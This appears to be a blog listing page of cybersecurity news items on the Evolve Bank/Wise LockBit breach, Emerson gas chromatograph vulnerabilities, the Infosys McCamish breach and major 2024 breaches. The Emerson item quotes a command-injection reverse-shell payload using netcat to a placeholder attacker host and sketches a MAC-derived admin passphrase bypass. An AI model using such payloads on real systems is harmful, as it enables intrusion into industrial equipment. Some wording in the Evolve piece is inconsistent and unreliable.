According to the statement, the attack was triggered by an Evolve employee clicking on a malicious phishing link sent to him in late May. Even though the attackers did not access most of the cash that customers had in their accounts, the hackers had access to and downloaded their personal information from databases and a file share. Furthermore, the company encrypted some of its data, but since backups were made, the company had to deal with limited loss of data and impact on its operations. Several days ago, the Federal Reserve Board announced that it would enforce the anti-money laundering, risk management, and consumer compliance programs of Evolve Bank & Trust. It accused the company of deficiencies in these areas, as well as other areas. 

In a statement the Federal Reserve published in February 2023, the Fed noted that examinations conducted in 2023 found that Evolve had a risk-management program and controls that were not adequate to comply with anti-money laundering laws and consumer protection laws. According to Stephen Gates, principal security SME for Horizon3.AI, the biggest decision any organization needs to make once they have experienced a breach is what to do about what they are going to do next once the smoke begins to clear. 

A regulated bank, Evolve Bank & Trust, provided USD account details, between 2020 and 2023 as part of the contract with the bank. Recently, Wise has been the victim of a data breach involving the personal information of perhaps some of the company's customers. Wise customers need identifying information for Evolve Bank & Trust to provide USD account details. Information that the company shared with Evolve Bank & Trust to provide USD account details, such as names, addresses, dates of birth, contact info, SSNs or EINs for US customers, or another document number for non-US customers. Neither Evolve nor the company has confirmed what data was affected. 

The LockBit ransomware group recently attacked Evolve Bank, an Arkansas-based financial institution. The attack resulted in data leaks on the Dark Web. After claiming to have hacked the US Fed earlier this week, LockBit got a lot of attention. When LockBit posted a threat to release "33 terabytes of juicy banking information containing Americans' banking secrets" if a ransom was not paid, it released some of the stolen data. At the end of the month, LockBit was kicked out of Evolve's system. 

As soon as the victim wouldn't pay the ransom, the group leaked the information. It's also a payments processor, and it offers business-to-business (B2B) banking-as-a-service (BaaS) and business-to-consumer (B2C) banking-as-a-service. More victims are coming forward of the breach, which has affected more than just its direct customers. The multibillion-dollar London-based fintech company Wise, according to a statement released last week, disclosed its partnership with Evolve Bank & Trust from 2020 to 2023. 

During this period, Wise collaborated with Evolve to "provide USD account details" to its customers. To facilitate this service, Wise shared sensitive customer information with Evolve, including names, addresses, dates of birth, contact details, and identification numbers, such as employer identification numbers and Social Security numbers. Wise indicated that this data "may have been involved" in Evolve's recent security breach. Similarly, the buy now, pay later (BNPL) company Affirm, which utilizes Evolve for the issuance and servicing of its Affirm Cards, reported potential exposure of customer information. 

Although Affirm clarified that customers' cards remained unaffected, the personal data shared with Evolve posed a significant concern. In an 8-K filing with the Securities and Exchange Commission (SEC), Affirm stated, "The full scope, nature, and impact of the incident on the Company and Affirm Card users, including the extent to which there has been unauthorized access to Affirm Card user Personal Information, are not yet known." Evolve's breach has prompted many of its other prominent partners in the financial services industry, including Stripe and Shopify, to investigate the potential impact on their customers' data. The situation remains under scrutiny as these companies assess whether their customers' sensitive information has been compromised.
Read more »
Third-Party Risks
Bank Data Leak Customer Data Data Breach Data Leak Financial Data Breach Fintech Ransomware attack Third-Party Risks

Wise and Evolve Data Breach Highlights Risks of Third-Party Partnerships

 

Wise, a prominent financial technology company, recently disclosed a data breach impacting some customer accounts due to a ransomware attack on their former partner, Evolve Bank & Trust. The breach has raised significant concerns about the security of third-party partnerships, especially in financial services. From 2020 to 2023, Wise partnered with Evolve to provide USD account details for their customers. Last week, Evolve confirmed an attack attributed to the notorious ransomware group LockBit. 

The group leaked the data after the bank refused to pay the ransom. The breach underscores the precarious nature of relying on third-party companies for critical services and trusting their security measures. Evolve has not yet confirmed the specific personal information leaked. However, Wise has taken a transparent approach, confirming that the shared information included names, addresses, dates of birth, contact details, Social Security numbers (SSNs) or Employer Identification Numbers (EINs) for U.S. customers, and other identity document numbers for non-U.S. customers. 

Evolve’s initial investigation suggests that names, SSNs, bank account numbers, and contact information for most of their personal banking customers, as well as customers of their Open Banking partners, were affected. In response to the breach, Wise assured its customers that they no longer work with Evolve Bank & Trust. Currently, USD account details are provided by a different bank, emphasizing their commitment to security and customer trust. 

Wise has implemented additional security protocols and is collaborating with cybersecurity experts to understand the breach’s scope and fortify their defenses. Wise has proactively communicated with its customers, recommending precautionary steps such as changing passwords, enabling two-factor authentication, and monitoring account activity for any suspicious transactions. They have also provided resources and support to help customers protect their information. The breach has heightened concerns among customers regarding the security of their personal and financial information. 

Despite the challenges posed by the breach, Wise’s proactive approach and transparent communication have helped reassure customers. The company continues to work closely with cybersecurity experts to enhance their defenses and prevent future incidents. As the investigation progresses, Wise is determined to provide regular updates and support to affected customers. Their dedication to transparency and user security remains unwavering, ensuring that they take every step necessary to safeguard their users’ information and maintain their trust. 

This incident highlights the growing threat of cyberattacks on financial institutions and the critical need for robust security measures. Customers are reminded to stay alert and take proactive steps to protect their online accounts. Wise’s efforts to address the breach and protect their users underscore their commitment to maintaining trust and security for their customers.
Read more »
sensitive data exposure
Authentication Bypass Command Injection Data Breach denial-of-service conditions Emerson gas chromatographs vulnerabilities sensitive data exposure

Critical Vulnerabilities in Emerson Gas Chromatographs Expose Sensitive Data

 

Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands. 

Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.

Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.

The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command implementation. This flaw is tied to a system function that calls a constructed shell command with a user-provided file name without proper sanitization, allowing an attacker to inject arbitrary shell commands.

An attacker could exploit this by supplying crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.

The second vulnerability, CVE-2023-51761, is an authentication bypass that enables an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password. The passphrase, derived from the device's MAC address, can be easily obtained. By understanding the passphrase validation process, an attacker can generate the passphrase using the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.

The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.

Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.
Read more »
SSNs
Banking Information customer data compromise Data Breach Data Leak IMS Information Security LockBit LockBit ransomware Ransomware attack SSNs

LockBit Ransomware Attack on Infosys McCamish Systems Exposes Sensitive Data of Over Six Million Individuals

 

Infosys McCamish Systems (IMS) recently disclosed that a LockBit ransomware attack earlier this year compromised sensitive information of more than six million individuals. IMS, a multinational corporation specializing in business consulting, IT, and outsourcing services, primarily serves the insurance and financial services industries. The company has a significant presence in the U.S., catering to large financial institutions such as the Bank of America and seven out of the top ten insurers in the country. 

In February 2024, IMS informed the public about the ransomware attack that occurred in November 2023. Initially, the company reported that the personal data of around 57,000 Bank of America customers had been compromised. LockBit, the group responsible for the attack, claimed to have encrypted 2,000 computers within the IMS network. A recent notification to U.S. authorities revealed that the total number of affected individuals now exceeds six million. The notification outlined the steps taken by IMS, including the involvement of third-party eDiscovery experts, to conduct a thorough review of the compromised data. 

This review aimed to identify the personal information accessed and determine the individuals impacted. The compromised data includes a wide range of sensitive information, such as Social Security Numbers (SSNs), dates of birth, medical records, biometric data, email addresses and passwords, usernames and passwords, driver’s license or state ID numbers, financial account information, payment card details, passport numbers, tribal ID numbers, and U.S. military ID numbers. To mitigate the risks associated with this data exposure, IMS is offering affected individuals a free two-year identity protection and credit monitoring service through Kroll. 

The notification letters provided instructions on how to access these services. IMS has not disclosed the full list of impacted clients, but the notification mentioned Oceanview Life and Annuity Company (OLAC), an Arizona-based provider of fixed and fixed-indexed annuities, as one of the affected organizations. The list of impacted data owners may be updated as more customers request to be named in the filing. 

This breach highlights the critical importance of robust cybersecurity measures and the significant impact such attacks can have on both individuals and large financial institutions. The LockBit ransomware attack on IMS serves as a stark reminder of the vulnerabilities within the digital infrastructure of major corporations and the far-reaching consequences of data breaches.
Read more »
Threat Landscape
Cyber Attacks Data Breach Data Leak ransomware attacks Threat Landscape

Top Data Breaches and Cyber Attacks in 2024

 

We're more than halfway into 2024, and we've already witnessed some of the largest and the most damaging data breaches in recent history. And just when you thought some of these hacks couldn't be much worse, they did. The worst data breaches of 2024 to date have already surpassed at least 1 billion stolen records and are expected to rise further. These breaches have an impact not just on the individuals whose data was irretrievably compromised, but also embolden the criminals who profit from their malicious cyberattacks. 

AT&T data leak 

Three years after an internet hacker leaked a sample of allegedly stolen AT&T customer data, a data breach broker released the whole cache of 73 million user records to the public on an infamous cybercrime forum in March. consumers' names, phone numbers, and postal addresses were among the personal information released in the data, and some consumers attested to the accuracy of their information. 

However, the telecom giant didn't respond until a security researcher found that the exposed data contained encrypted passwords needed to access a customer's AT&T account. The security researcher told TechCrunch at the time that the encrypted passwords were easily unscrambled, placing roughly 7.6 million existing AT&T user accounts at risk of hijacking. After TechCrunch reported the researcher's findings, AT&T asked its users to reset their account passwords. 

Synnovis ransomware attack 

A June cyberattack on Synnovis, a blood and tissue testing lab serving hospitals and health institutions in the United Kingdom's capital, caused weeks of severe disruption to patient services. Following the attack, the local National Health Service trusts that rely on the lab postponed thousands of operations and treatments, triggering the UK health sector to call for a serious emergency. 

A Russia-based ransomware gang was blamed for the cyberattack, which resulted in the theft of data relating to nearly 300 million patient interactions over a "significant number" of years. The implications for those affected, similar to those of the Change Healthcare data breach, are expected to be severe and long-lasting. 

Snowflake hack

A series of data thefts from cloud data provider Snowflake quickly escalated into one of the year's largest breaches, thanks to the massive volumes of data stolen from its corporate customers. 

Cybercriminals stole hundreds of millions of customer records from some of the world's largest companies, including an alleged 560 million records from Ticketmaster, 79 million records from Advance Auto Parts, and approximately 30 million records from TEG, by using stolen credentials of data engineers with access to their employers' Snowflake environments. Snowflake, for its part, does not demand (or enforce) that its customers employ the security feature, which protects against breaches based on stolen or reused passwords.
Read more »
Subscribe to: Posts (Atom)